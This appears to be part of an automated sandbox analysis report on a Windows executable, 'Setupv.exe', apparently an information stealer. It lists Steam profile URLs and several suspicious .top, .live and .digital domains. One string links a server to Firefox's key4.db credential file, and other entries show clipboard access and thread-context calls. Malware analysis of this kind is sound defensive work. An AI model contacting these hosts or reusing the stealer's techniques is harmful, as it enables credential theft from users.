        Source: Setupv.exe, 00000000.00000003.1719338047.0000000000D05000.00000004.00000020.00020000.00000000.sdmp, Setupv.exe, 00000000.00000003.1786932542.0000000000D02000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://steambroadcast-test.akamaized.net
        Source: Setupv.exe, 00000000.00000003.1719338047.0000000000D05000.00000004.00000020.00020000.00000000.sdmp, Setupv.exe, 00000000.00000003.1786932542.0000000000D02000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://steambroadcast.akamaized.net
        Source: Setupv.exe, 00000000.00000003.1719338047.0000000000D05000.00000004.00000020.00020000.00000000.sdmp, Setupv.exe, 00000000.00000003.1786932542.0000000000D02000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://steambroadcastchat.akamaized.net
        Source: Setupv.exe, 00000000.00000003.1719338047.0000000000D05000.00000004.00000020.00020000.00000000.sdmp, Setupv.exe, 00000000.00000003.1786932542.0000000000D02000.00000004.00000020.00020000.00000000.sdmp, Setupv.exe, 00000000.00000003.1719414142.0000000000CA3000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://steamcommunity.com/
        Source: Setupv.exe, 00000000.00000003.1719383928.0000000003AA7000.00000004.00000800.00020000.00000000.sdmp, Setupv.exe, 00000000.00000003.1719338047.0000000000D05000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://steamcommunity.com/?subsection=broadcasts
        Source: Setupv.exe, 00000000.00000003.1719383928.0000000003AA7000.00000004.00000800.00020000.00000000.sdmp, Setupv.exe, 00000000.00000003.1719338047.0000000000D05000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://steamcommunity.com/discussions/
        Source: Setupv.exe, 00000000.00000003.1719338047.0000000000D05000.00000004.00000020.00020000.00000000.sdmp, Setupv.exe, 00000000.00000003.1719676409.0000000003AA1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://steamcommunity.com/linkfilter/?u=http%3A%2F%2Fwww.geonames.org
        Source: Setupv.exe, 00000000.00000003.1719338047.0000000000D05000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://steamcommunity.com/login/home/?goto=profiles%2F76561199845513035
        Source: Setupv.exe, 00000000.00000003.1719383928.0000000003AA7000.00000004.00000800.00020000.00000000.sdmp, Setupv.exe, 00000000.00000003.1719338047.0000000000D05000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://steamcommunity.com/market/
        Source: Setupv.exe, 00000000.00000003.1719383928.0000000003AA7000.00000004.00000800.00020000.00000000.sdmp, Setupv.exe, 00000000.00000003.1719338047.0000000000D05000.00000004.00000020.00020000.00000000.sdmp, Setupv.exe, 00000000.00000003.1719676409.0000000003AA1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://steamcommunity.com/my/wishlist/
        Source: Setupv.exe, 00000000.00000002.1853289958.0000000000CEE000.00000004.00000020.00020000.00000000.sdmp, Setupv.exe, 00000000.00000003.1818208188.0000000000CEE000.00000004.00000020.00020000.00000000.sdmp, Setupv.exe, 00000000.00000003.1810483565.0000000000CEE000.00000004.00000020.00020000.00000000.sdmp, Setupv.exe, 00000000.00000003.1786932542.0000000000CEE000.00000004.00000020.00020000.00000000.sdmp, Setupv.exe, 00000000.00000003.1816496507.0000000000CEE000.00000004.00000020.00020000.00000000.sdmp, Setupv.exe, 00000000.00000003.1719414142.0000000000CED000.00000004.00000020.00020000.00000000.sdmp, Setupv.exe, 00000000.00000003.1719414142.0000000000CA3000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://steamcommunity.com/profiles/76561199845513035
        Source: Setupv.exe, 00000000.00000003.1719338047.0000000000D05000.00000004.00000020.00020000.00000000.sdmp, Setupv.exe, 00000000.00000003.1719676409.0000000003AA1000.00000004.00000800.00020000.00000000.sdmp, Setupv.exe, 00000000.00000003.1719414142.0000000000C79000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://steamcommunity.com/profiles/76561199845513035/badges
        Source: Setupv.exe, 00000000.00000003.1719338047.0000000000D05000.00000004.00000020.00020000.00000000.sdmp, Setupv.exe, 00000000.00000003.1719676409.0000000003AA1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://steamcommunity.com/profiles/76561199845513035/inventory/
        Source: Setupv.exe, 00000000.00000003.1719414142.0000000000CA3000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://steamcommunity.com/profiles/765611998455130350
        Source: Setupv.exe, 00000000.00000003.1719414142.0000000000CA3000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://steamcommunity.com/profiles/765611998455130351
        Source: Setupv.exe, 00000000.00000003.1719383928.0000000003AA7000.00000004.00000800.00020000.00000000.sdmp, Setupv.exe, 00000000.00000003.1719338047.0000000000D05000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://steamcommunity.com/workshop/
        Source: Setupv.exe, 00000000.00000003.1719414142.0000000000C82000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://steamcommunity.com:443/profiles/76561199845513035
        Source: Setupv.exe, 00000000.00000003.1719338047.0000000000D05000.00000004.00000020.00020000.00000000.sdmp, Setupv.exe, 00000000.00000003.1786932542.0000000000D02000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://steamloopback.host
        Source: Setupv.exe, 00000000.00000003.1719383928.0000000003AA7000.00000004.00000800.00020000.00000000.sdmp, Setupv.exe, 00000000.00000003.1719676409.0000000003AA1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://store.steampowered.
        Source: Setupv.exe, 00000000.00000003.1786932542.0000000000D02000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://store.steampowered.com/
        Source: Setupv.exe, 00000000.00000003.1719414142.0000000000CFD000.00000004.00000020.00020000.00000000.sdmp, Setupv.exe, 00000000.00000002.1853289958.0000000000D02000.00000004.00000020.00020000.00000000.sdmp, Setupv.exe, 00000000.00000003.1719338047.0000000000D05000.00000004.00000020.00020000.00000000.sdmp, Setupv.exe, 00000000.00000003.1786932542.0000000000D02000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://store.steampowered.com/;
        Source: Setupv.exe, 00000000.00000003.1719338047.0000000000D05000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://store.steampowered.com/;X-Frame-OptionsSAMEORIGINPersistent-AuthWWW-AuthenticateAccept-Encod
        Source: Setupv.exe, 00000000.00000003.1719338047.0000000000D05000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://store.steampowered.com/about/
        Source: Setupv.exe, 00000000.00000003.1719383928.0000000003AA7000.00000004.00000800.00020000.00000000.sdmp, Setupv.exe, 00000000.00000003.1719338047.0000000000D05000.00000004.00000020.00020000.00000000.sdmp, Setupv.exe, 00000000.00000003.1719676409.0000000003AA1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://store.steampowered.com/explore/
        Source: Setupv.exe, 00000000.00000003.1719338047.0000000000D05000.00000004.00000020.00020000.00000000.sdmp, Setupv.exe, 00000000.00000003.1719676409.0000000003AA1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://store.steampowered.com/legal/
        Source: Setupv.exe, 00000000.00000003.1719383928.0000000003AA7000.00000004.00000800.00020000.00000000.sdmp, Setupv.exe, 00000000.00000003.1719338047.0000000000D05000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://store.steampowered.com/mobile
        Source: Setupv.exe, 00000000.00000003.1719383928.0000000003AA7000.00000004.00000800.00020000.00000000.sdmp, Setupv.exe, 00000000.00000003.1719338047.0000000000D05000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://store.steampowered.com/news/
        Source: Setupv.exe, 00000000.00000003.1719383928.0000000003AA7000.00000004.00000800.00020000.00000000.sdmp, Setupv.exe, 00000000.00000003.1719338047.0000000000D05000.00000004.00000020.00020000.00000000.sdmp, Setupv.exe, 00000000.00000003.1719676409.0000000003AA1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://store.steampowered.com/points/shop/
        Source: Setupv.exe, 00000000.00000003.1719383928.0000000003AA7000.00000004.00000800.00020000.00000000.sdmp, Setupv.exe, 00000000.00000003.1719338047.0000000000D05000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://store.steampowered.com/privacy_agreement/
        Source: Setupv.exe, 00000000.00000003.1719383928.0000000003AA7000.00000004.00000800.00020000.00000000.sdmp, Setupv.exe, 00000000.00000003.1719338047.0000000000D05000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://store.steampowered.com/stats/
        Source: Setupv.exe, 00000000.00000003.1719383928.0000000003AA7000.00000004.00000800.00020000.00000000.sdmp, Setupv.exe, 00000000.00000003.1719338047.0000000000D05000.00000004.00000020.00020000.00000000.sdmp, Setupv.exe, 00000000.00000003.1719676409.0000000003AA1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://store.steampowered.com/steam_refunds/
        Source: Setupv.exe, 00000000.00000003.1719383928.0000000003AA7000.00000004.00000800.00020000.00000000.sdmp, Setupv.exe, 00000000.00000003.1719338047.0000000000D05000.00000004.00000020.00020000.00000000.sdmp, Setupv.exe, 00000000.00000003.1719676409.0000000003AA1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://store.steampowered.com/subscriber_agreement/
        Source: Setupv.exe, 00000000.00000003.1765988082.0000000003F5F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://support.mozilla.org/kb/customize-firefox-controls-buttons-and-toolbars?utm_source=firefox-br
        Source: Setupv.exe, 00000000.00000003.1765988082.0000000003F5F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://support.mozilla.org/products/firefoxgro.all
        Source: Setupv.exe, 00000000.00000003.1719414142.0000000000CA3000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://topographky.top/f.ms1&
        Source: Setupv.exe, 00000000.00000003.1719414142.0000000000CA3000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://topographky.top/l/
        Source: Setupv.exe, 00000000.00000003.1719414142.0000000000CA3000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://topographky.top/xlakoam
        Source: Setupv.exe, 00000000.00000003.1719414142.0000000000C82000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://topographky.top:443/xlak
        Source: Setupv.exe, 00000000.00000002.1853289958.0000000000CDD000.00000004.00000020.00020000.00000000.sdmp, Setupv.exe, 00000000.00000003.1816496507.0000000000CDD000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://toptalentw.top/
        Source: Setupv.exe, 00000000.00000003.1810483565.0000000000CDD000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://toptalentw.top/E
        Source: Setupv.exe, 00000000.00000003.1818208188.0000000000CDD000.00000004.00000020.00020000.00000000.sdmp, Setupv.exe, 00000000.00000002.1853289958.0000000000CDD000.00000004.00000020.00020000.00000000.sdmp, Setupv.exe, 00000000.00000003.1816496507.0000000000CDD000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://toptalentw.top/a
        Source: Setupv.exe, 00000000.00000002.1855899995.0000000003ABA000.00000004.00000800.00020000.00000000.sdmp, Setupv.exe, 00000000.00000003.1816496507.0000000000CE6000.00000004.00000020.00020000.00000000.sdmp, Setupv.exe, 00000000.00000003.1810042007.0000000003B2F000.00000004.00000800.00020000.00000000.sdmp, Setupv.exe, 00000000.00000003.1817707824.0000000003B10000.00000004.00000800.00020000.00000000.sdmp, Setupv.exe, 00000000.00000002.1852863691.0000000000C2E000.00000004.00000020.00020000.00000000.sdmp, Setupv.exe, 00000000.00000003.1765225459.0000000003B2E000.00000004.00000800.00020000.00000000.sdmp, Setupv.exe, 00000000.00000003.1764418270.0000000003B3B000.00000004.00000800.00020000.00000000.sdmp, Setupv.exe, 00000000.00000003.1763600495.0000000003B3B000.00000004.00000800.00020000.00000000.sdmp, Setupv.exe, 00000000.00000003.1810483565.0000000000CE6000.00000004.00000020.00020000.00000000.sdmp, Setupv.exe, 00000000.00000003.1845565187.0000000003B2D000.00000004.00000800.00020000.00000000.sdmp, Setupv.exe, 00000000.00000002.1853289958.0000000000CE6000.00000004.00000020.00020000.00000000.sdmp, Setupv.exe, 00000000.00000003.1750829027.0000000003B2E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://toptalentw.top/qena
        Source: Setupv.exe, 00000000.00000002.1852863691.0000000000C2E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://toptalentw.top/qenaJ
        Source: Setupv.exe, 00000000.00000002.1852863691.0000000000C2E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://toptalentw.top/qenan
        Source: Setupv.exe, 00000000.00000002.1855899995.0000000003ABA000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://toptalentw.top/qenar
        Source: Setupv.exe, 00000000.00000002.1853132454.0000000000C85000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://toptalentw.top:443/qenal
        Source: Setupv.exe, 00000000.00000003.1845958800.0000000000C85000.00000004.00000020.00020000.00000000.sdmp, Setupv.exe, 00000000.00000003.1811025242.0000000000C85000.00000004.00000020.00020000.00000000.sdmp, Setupv.exe, 00000000.00000002.1853132454.0000000000C85000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://toptalentw.top:443/qenazchhhv.default-release/key4.dbPK
        Source: Setupv.exe, 00000000.00000002.1852863691.0000000000C2E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://transdataa.digital/
        Source: Setupv.exe, 00000000.00000002.1853289958.0000000000C9C000.00000004.00000020.00020000.00000000.sdmp, Setupv.exe, 00000000.00000003.1816496507.0000000000C9C000.00000004.00000020.00020000.00000000.sdmp, Setupv.exe, 00000000.00000003.1719414142.0000000000C98000.00000004.00000020.00020000.00000000.sdmp, Setupv.exe, 00000000.00000003.1818208188.0000000000C9E000.00000004.00000020.00020000.00000000.sdmp, Setupv.exe, 00000000.00000003.1810483565.0000000000C9C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://transdataa.digital/xwpa
        Source: Setupv.exe, 00000000.00000003.1719414142.0000000000CA3000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://tropiscbs.live/
        Source: Setupv.exe, 00000000.00000003.1719414142.0000000000CA3000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://tropiscbs.live/S
        Source: Setupv.exe, 00000000.00000003.1719414142.0000000000CA3000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://tropiscbs.live/iuwxx
        Source: Setupv.exe, 00000000.00000003.1719414142.0000000000CA3000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://tropiscbs.live/iuwxxr
        Source: Setupv.exe, 00000000.00000003.1719414142.0000000000CA3000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://vigorbridgoe.top/
        Source: Setupv.exe, 00000000.00000002.1852863691.0000000000C2E000.00000004.00000020.00020000.00000000.sdmp, Setupv.exe, 00000000.00000003.1719414142.0000000000CA3000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://vigorbridgoe.top/banb
        Source: Setupv.exe, 00000000.00000003.1719414142.0000000000CA3000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://vigorbridgoe.top/banb8
        Source: Setupv.exe, 00000000.00000003.1719414142.0000000000C82000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://vigorbridgoe.top:443/banb
        Source: Setupv.exe, 00000000.00000003.1719414142.0000000000CA3000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://woodpeckersd.run/
        Source: Setupv.exe, 00000000.00000003.1719414142.0000000000CA3000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://woodpeckersd.run/glsk
        Source: Setupv.exe, 00000000.00000003.1766530993.0000000003AE8000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.amazon.com/?tag=admarketus-20&ref=pd_sl_35787f1071928bc3a1aef90b79c9bee9c64ba6683fde7477
        Source: Setupv.exe, 00000000.00000003.1766530993.0000000003AE8000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.bestbuy.com/site/electronics/top-deals/pcmcat1563299784494.c/?id=pcmcat1563299784494&ref
        Source: Setupv.exe, 00000000.00000003.1736580878.0000000003AE0000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.ecosia.org/newtab/v20
        Source: Setupv.exe, 00000000.00000003.1719338047.0000000000D05000.00000004.00000020.00020000.00000000.sdmp, Setupv.exe, 00000000.00000003.1786932542.0000000000D02000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.google.com
        Source: Setupv.exe, 00000000.00000003.1736580878.0000000003AE0000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.google.com/images/branding/product/ico/googleg_alldp.ico
        Source: Setupv.exe, 00000000.00000003.1786932542.0000000000D02000.00000004.00000020.00020000.00000000.sdmp, Setupv.exe, 00000000.00000003.1818208188.0000000000D02000.00000004.00000020.00020000.00000000.sdmp, Setupv.exe, 00000000.00000003.1810483565.0000000000D02000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.google.com/recaptcha/
        Source: Setupv.exe, 00000000.00000003.1719414142.0000000000CFD000.00000004.00000020.00020000.00000000.sdmp, Setupv.exe, 00000000.00000002.1853289958.0000000000D02000.00000004.00000020.00020000.00000000.sdmp, Setupv.exe, 00000000.00000003.1816496507.0000000000D02000.00000004.00000020.00020000.00000000.sdmp, Setupv.exe, 00000000.00000003.1786932542.0000000000D02000.00000004.00000020.00020000.00000000.sdmp, Setupv.exe, 00000000.00000003.1818208188.0000000000D02000.00000004.00000020.00020000.00000000.sdmp, Setupv.exe, 00000000.00000003.1810483565.0000000000D02000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.gstatic.cn/recaptcha/
        Source: Setupv.exe, 00000000.00000003.1719414142.0000000000CFD000.00000004.00000020.00020000.00000000.sdmp, Setupv.exe, 00000000.00000002.1853289958.0000000000D02000.00000004.00000020.00020000.00000000.sdmp, Setupv.exe, 00000000.00000003.1816496507.0000000000D02000.00000004.00000020.00020000.00000000.sdmp, Setupv.exe, 00000000.00000003.1786932542.0000000000D02000.00000004.00000020.00020000.00000000.sdmp, Setupv.exe, 00000000.00000003.1818208188.0000000000D02000.00000004.00000020.00020000.00000000.sdmp, Setupv.exe, 00000000.00000003.1810483565.0000000000D02000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.gstatic.com/recaptcha/
        Source: Setupv.exe, 00000000.00000003.1765988082.0000000003F5F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.org/about/gro.allizom.www.CDjelnmQJyZc
        Source: Setupv.exe, 00000000.00000003.1765988082.0000000003F5F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.org/contribute/gro.allizom.www.b3lOZaxJcpF6
        Source: Setupv.exe, 00000000.00000003.1765988082.0000000003F5F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.org/en-US/privacy/firefox/Firefox
        Source: Setupv.exe, 00000000.00000003.1765988082.0000000003F5F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.org/firefox/?utm_medium=firefox-desktop&utm_source=bookmarks-toolbar&utm_campaig
        Source: Setupv.exe, 00000000.00000003.1765988082.0000000003F5F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.org/media/img/mozorg/mozilla-256.4720741d4108.jpg
        Source: Setupv.exe, 00000000.00000003.1765988082.0000000003F5F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.org/privacy/firefox/gro.allizom.www.
        Source: Setupv.exe, 00000000.00000003.1719338047.0000000000D05000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.valvesoftware.com/en/contact?contact-person=Translation%20Team%20Feedback
        Source: Setupv.exe, 00000000.00000003.1719338047.0000000000D05000.00000004.00000020.00020000.00000000.sdmp, Setupv.exe, 00000000.00000003.1786932542.0000000000D02000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.youtube.com
        Source: Setupv.exe, 00000000.00000003.1719414142.0000000000CFD000.00000004.00000020.00020000.00000000.sdmp, Setupv.exe, 00000000.00000002.1853289958.0000000000D02000.00000004.00000020.00020000.00000000.sdmp, Setupv.exe, 00000000.00000003.1816496507.0000000000D02000.00000004.00000020.00020000.00000000.sdmp, Setupv.exe, 00000000.00000003.1786932542.0000000000D02000.00000004.00000020.00020000.00000000.sdmp, Setupv.exe, 00000000.00000003.1818208188.0000000000D02000.00000004.00000020.00020000.00000000.sdmp, Setupv.exe, 00000000.00000003.1810483565.0000000000D02000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.youtube.com/
        Source: unknownNetwork traffic detected: HTTP traffic on port 49698 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49700
        Source: unknownNetwork traffic detected: HTTP traffic on port 49699 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49699
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49698
        Source: unknownNetwork traffic detected: HTTP traffic on port 49695 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49695
        Source: unknownNetwork traffic detected: HTTP traffic on port 49702 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 49703 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 49704 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 49700 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 49701 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49704
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49703
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49702
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49701
        Source: unknownHTTPS traffic detected: 172.67.182.68:443 -> 192.168.2.5:49695 version: TLS 1.2
        Source: unknownHTTPS traffic detected: 23.52.218.12:443 -> 192.168.2.5:49698 version: TLS 1.2
        Source: unknownHTTPS traffic detected: 104.21.36.133:443 -> 192.168.2.5:49699 version: TLS 1.2
        Source: unknownHTTPS traffic detected: 104.21.36.133:443 -> 192.168.2.5:49700 version: TLS 1.2
        Source: unknownHTTPS traffic detected: 104.21.36.133:443 -> 192.168.2.5:49701 version: TLS 1.2
        Source: unknownHTTPS traffic detected: 104.21.36.133:443 -> 192.168.2.5:49702 version: TLS 1.2
        Source: unknownHTTPS traffic detected: 104.21.36.133:443 -> 192.168.2.5:49703 version: TLS 1.2
        Source: unknownHTTPS traffic detected: 104.21.36.133:443 -> 192.168.2.5:49704 version: TLS 1.2
        Source: C:\Users\user\Desktop\Setupv.exeCode function: 0_3_02E4C950 OpenClipboard,GetClipboardData,GlobalLock,GetWindowRect,GlobalUnlock,CloseClipboard,0_3_02E4C950
        Source: C:\Users\user\Desktop\Setupv.exeCode function: 0_3_02E4C950 OpenClipboard,GetClipboardData,GlobalLock,GetWindowRect,GlobalUnlock,CloseClipboard,0_3_02E4C950
        Source: C:\Users\user\Desktop\Setupv.exeCode function: 0_3_00BA10E8 NtTerminateThread,0_3_00BA10E8
        Source: C:\Users\user\Desktop\Setupv.exeCode function: 0_3_00BA0B72 NtGetContextThread,NtSetContextThread,NtResumeThread,0_3_00BA0B72
        Source: C:\Users\user\Desktop\Setupv.exeCode function: 0_3_00BA0CD8 NtAllocateVirtualMemory,NtFreeVirtualMemory,0_3_00BA0CD8
        Source: C:\Users\user\Desktop\Setupv.exeCode function: 0_3_00BA066E NtProtectVirtualMemory,0_3_00BA066E
        Source: C:\Users\user\Desktop\Setupv.exeCode function: 0_2_02731F66 NtFreeVirtualMemory,0_2_02731F66
        Source: C:\Users\user\Desktop\Setupv.exeCode function: 0_2_02731F13 NtAllocateVirtualMemory,0_2_02731F13
        Source: C:\Users\user\Desktop\Setupv.exeCode function: 0_2_02731FA4 NtProtectVirtualMemory,0_2_02731FA4
        Source: C:\Users\user\Desktop\Setupv.exeCode function: 0_3_02E35A800_3_02E35A80
        Source: C:\Users\user\Desktop\Setupv.exeCode function: 0_3_02E1DBA00_3_02E1DBA0
        Source: C:\Users\user\Desktop\Setupv.exeCode function: 0_3_02E54BB00_3_02E54BB0
        Source: C:\Users\user\Desktop\Setupv.exeCode function: 0_3_02E220F80_3_02E220F8
        Source: C:\Users\user\Desktop\Setupv.exeCode function: 0_3_02E5B9D00_3_02E5B9D0
        Source: C:\Users\user\Desktop\Setupv.exeCode function: 0_3_02E3D9100_3_02E3D910
        Source: C:\Users\user\Desktop\Setupv.exeCode function: 0_3_02E1B7C00_3_02E1B7C0
        Source: C:\Users\user\Desktop\Setupv.exeCode function: 0_3_02E25F700_3_02E25F70
        Source: C:\Users\user\Desktop\Setupv.exeCode function: 0_3_02E2B4FD0_3_02E2B4FD
        Source: C:\Users\user\Desktop\Setupv.exeCode function: 0_3_02E5C4C00_3_02E5C4C0
        Source: C:\Users\user\Desktop\Setupv.exeCode function: 0_3_02E2EC240_3_02E2EC24
        Source: C:\Users\user\Desktop\Setupv.exeCode function: 0_3_02E254180_3_02E25418
        Source: C:\Users\user\Desktop\Setupv.exeCode function: 0_3_02E50DB00_3_02E50DB0
        Source: C:\Users\user\Desktop\Setupv.exeCode function: 0_3_02E192900_3_02E19290
        Source: C:\Users\user\Desktop\Setupv.exeCode function: 0_3_02E322600_3_02E32260
        Source: C:\Users\user\Desktop\Setupv.exeCode function: 0_3_02E1AA700_3_02E1AA70
        Source: C:\Users\user\Desktop\Setupv.exeCode function: 0_3_02E46A700_3_02E46A70
        Source: C:\Users\user\Desktop\Setupv.exeCode function: 0_3_02E25A770_3_02E25A77
        Source: C:\Users\user\Desktop\Setupv.exeCode function: 0_3_02E1C3F00_3_02E1C3F0
        Source: C:\Users\user\Desktop\Setupv.exeCode function: 0_3_02E20BC00_3_02E20BC0
        Source: C:\Users\user\Desktop\Setupv.exeCode function: 0_3_02E2E3CC0_3_02E2E3CC
        Source: C:\Users\user\Desktop\Setupv.exeCode function: 0_3_02E3AB960_3_02E3AB96
        Source: C:\Users\user\Desktop\Setupv.exeCode function: 0_3_02E1CB700_3_02E1CB70
        Source: C:\Users\user\Desktop\Setupv.exeCode function: 0_3_02E55B700_3_02E55B70
        Source: C:\Users\user\Desktop\Setupv.exeCode function: 0_3_02E503700_3_02E50370
        Source: C:\Users\user\Desktop\Setupv.exeCode function: 0_3_02E300E00_3_02E300E0
        Source: C:\Users\user\Desktop\Setupv.exeCode function: 0_3_02E138D00_3_02E138D0
        Source: C:\Users\user\Desktop\Setupv.exeCode function: 0_3_02E130D00_3_02E130D0
        Source: C:\Users\user\Desktop\Setupv.exeCode function: 0_3_02E3A0D70_3_02E3A0D7
        Source: C:\Users\user\Desktop\Setupv.exeCode function: 0_3_02E1A0700_3_02E1A070
        Source: C:\Users\user\Desktop\Setupv.exeCode function: 0_3_02E591E00_3_02E591E0
        Source: C:\Users\user\Desktop\Setupv.exeCode function: 0_3_02E599F00_3_02E599F0
        Source: C:\Users\user\Desktop\Setupv.exeCode function: 0_3_02E189C00_3_02E189C0
        Source: C:\Users\user\Desktop\Setupv.exeCode function: 0_3_02E4C1A00_3_02E4C1A0
        Source: C:\Users\user\Desktop\Setupv.exeCode function: 0_3_02E1F9800_3_02E1F980
        Source: C:\Users\user\Desktop\Setupv.exeCode function: 0_3_02E211490_3_02E21149
        Source: C:\Users\user\Desktop\Setupv.exeCode function: 0_3_02E5C1500_3_02E5C150
        Source: C:\Users\user\Desktop\Setupv.exeCode function: 0_3_02E369000_3_02E36900
        Source: C:\Users\user\Desktop\Setupv.exeCode function: 0_3_02E501100_3_02E50110
        Source: C:\Users\user\Desktop\Setupv.exeCode function: 0_3_02E3468B0_3_02E3468B
        Source: C:\Users\user\Desktop\Setupv.exeCode function: 0_3_02E51E900_3_02E51E90
        Source: C:\Users\user\Desktop\Setupv.exeCode function: 0_3_02E23E600_3_02E23E60
        Source: C:\Users\user\Desktop\Setupv.exeCode function: 0_3_02E34E500_3_02E34E50
        Source: C:\Users\user\Desktop\Setupv.exeCode function: 0_3_02E5BE500_3_02E5BE50
        Source: C:\Users\user\Desktop\Setupv.exeCode function: 0_3_02E297F00_3_02E297F0
        Source: C:\Users\user\Desktop\Setupv.exeCode function: 0_3_02E177A00_3_02E177A0
        Source: C:\Users\user\Desktop\Setupv.exeCode function: 0_3_02E59FB00_3_02E59FB0
        Source: C:\Users\user\Desktop\Setupv.exeCode function: 0_3_02E1EF5C0_3_02E1EF5C
        Source: C:\Users\user\Desktop\Setupv.exeCode function: 0_3_02E1D7300_3_02E1D730
        Source: C:\Users\user\Desktop\Setupv.exeCode function: 0_3_02E334F80_3_02E334F8
        Source: C:\Users\user\Desktop\Setupv.exeCode function: 0_3_02E2DCD00_3_02E2DCD0
        Source: C:\Users\user\Desktop\Setupv.exeCode function: 0_3_02E184B00_3_02E184B0
        Source: C:\Users\user\Desktop\Setupv.exeCode function: 0_3_02E234900_3_02E23490
        Source: C:\Users\user\Desktop\Setupv.exeCode function: 0_3_02E245FF0_3_02E245FF
        Source: C:\Users\user\Desktop\Setupv.exeCode function: 0_3_02E595400_3_02E59540
        Source: C:\Users\user\Desktop\Setupv.exeCode function: 0_3_02E49D000_3_02E49D00
        Source: C:\Users\user\Desktop\Setupv.exeCode function: 0_2_027305090_2_02730509
        Source: C:\Users\user\Desktop\Setupv.exeCode function: 0_2_027300000_2_02730000
        Source: C:\Users\user\Desktop\Setupv.exeCode function: String function: 02E1B110 appears 34 times
        Source: Setupv.exeStatic PE information: invalid certificate
